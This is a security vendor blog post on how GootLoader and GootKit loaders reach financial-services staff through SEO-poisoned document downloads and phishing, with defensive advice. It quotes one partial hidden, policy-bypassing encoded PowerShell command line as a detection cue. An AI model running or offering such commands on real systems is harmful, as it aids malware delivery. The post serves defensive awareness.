How Ransomware Groups Exploit “Business as Usual” in FinServ
Posted by: GuidePoint Security
Guest Author: Chris Hencinski, Senior Solutions Architect, Expel
In the first quarter of 2025, financial services was the most targeted industry. And that’s saying something, because manufacturing, healthcare, entertainment, hospitality, and legal services are other heavily targeted industries. But by and large, FinServ remains a popular target of bad actors across the board.
But it’s not all bad news for FinServ. The GuidePoint Research & Intelligent Team (GRIT) observed a 24.5% decrease in observed ransomware attacks in banking and finance in 2024. GRIT attributes this drop to increased investments in cybersecurity across the industry, increased regulatory compliance and enforcement, and targeted takedowns of ransomware groups from law enforcement agencies.
A decrease in ransomware, however, does not mean it’s no longer a threat to financial services. These businesses remain squarely in the bullseye for ransomware gangs because they host valuable data, critical systems, and often a patchwork of users, tools, and copious vendors. It’s where the money is—literally.
Increasingly, we have seen a growing number of ransomware attempts that don’t come through the front door. They arrive disguised as something you were probably already looking for—like a tax form, or a Word doc with legal language (or more recently, a ClickFix-style pop-up or malware with fake code-signing certificates). It’s important to catch these attacks early in their lifecycle. One of the most common culprits we’ve seen lately? GootLoader and GootKit.
Let’s talk about it.
GootLoader & GootKit: the Pre-ransomware Duo
GootLoader isn’t an unknown at Expel. We’ve been reporting on and protecting against this malware for some time now. GootKit and GootLoader aren’t ransomware themselves—they’re malware loaders—tools that help attackers sneak malicious software into your environment.
Think of them as the delivery crew. Once they’ve got a foothold, they phone home to command-and-control infrastructure, paving the way for bigger, badder payloads (like ransomware) to follow.
Attackers leverage these loaders using a combination of phishing and SEO poisoning (more on that in a moment), especially in pre-ransomware campaigns. And while we block these threats before they escalate, the initial tactics are worth a closer look because ransomware doesn’t just happen. There are multiple stages and steps to this kind of attack, and those first steps can be particularly dangerous to financial services.
Why Financial Services Teams are Easy Marks
There are two main reasons attackers are seeing success with GootKit/GootLoader in financial services:
- Constant vendor interaction
FinServ orgs work with a lot of vendors. It’s normal for someone in procurement or operations to get emails from companies they’ve never interacted with before. If one of those emails contains a document or a link that looks halfway legitimate? It’s not hard to imagine a well-meaning employee clicking on it.
That’s the setup for GootLoader. The attackers know this. So they design emails and web pages that feel familiar enough to bypass suspicion. - Document-driven workflows
Financial services is a document-heavy industry—loan forms, tax paperwork, compliance reports, contracts, regulatory filings. And a lot of that documentation comes from government sites or standardized templates. But when you need something in a hurry, what do you do?
You google it.
This is where attackers are getting clever. They compromise legitimate websites and seed them with malicious files, making them look like free document downloads. Then they use SEO poisoning to bump these results to the top of search pages. So when your accounting assistant types “sample IRS form 433-D” into Google, they might get back a ZIP file that includes GootLoader instead of (or with) what they were looking for.
It’s not always obvious. In fact, it usually isn’t. And that’s exactly the point.
Spot These Attacks
From a detection standpoint, we often catch these attacks in the early stages—before full ransomware detonation.
Here’s a peek behind the curtain.
When GootLoader lands, it often executes via JavaScript or HTA files. We’ve seen command lines that spawn cscript.exe or launch suspicious PowerShell processes. Even without deep technical knowledge, a line like powershell -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand should raise an eyebrow. It doesn’t scream “normal business process.” (And if it doesn’t raise your eyebrows, well now you know.)
The attacker’s goal here is to establish a foothold, maintain persistence, and eventually download secondary payloads—like ransomware.
But that doesn’t mean your EDR will always catch it before something detonates.
Defending Against GootLoader & Friends
You don’t need a full threat intel team to get ahead of this stuff—though if you do need expert support, GuidePoint’s DFIR team can help detect and respond to these threats before they escalate. With that said, here are a few defensive plays you can start running today:
- Train employees to be document-skeptical. Encourage staff—especially those who rely heavily on templates and forms—not to blindly Google for documents. Set up internal resources with verified templates or work with vendors who can provide secure document repositories.
- Build better phishing detection muscle. The classic “check the sender” advice still applies. But consider extra scrutiny on inbound messages with document attachments, especially if they reference time-sensitive topics like taxes, compliance, or HR forms.
- Configure detection rules around scripting tools. Monitor for suspicious script execution (cscript.exe, encoded PowerShell commands, etc.). These might be rare in your environment—if they’re showing up, it’s worth investigating.
- Stop the spread before it starts. Pre-ransomware is stoppable. If you’re using an MDR service or an internal SOC, make sure they’re watching for early-stage loader activity and can act fast.
You don’t have to be a massive global bank to be a ransomware target. But you do need to think like one when it comes to risk mitigation. GootKit and GootLoader are persistent, sneaky, and successful because they exploit what many of us assume is “business as usual”—clicking a document link or downloading a form.
Staying ahead doesn’t mean stopping every attacker. It means creating enough friction that the next guy on the list looks like a better target (sorry, next guy).
And in most cases? That’s enough to win the day.
Download our FinServ threat report to learn more about industry trends. And check out our website to learn more about how Expel is working to keep financial data secure.
GuidePoint Security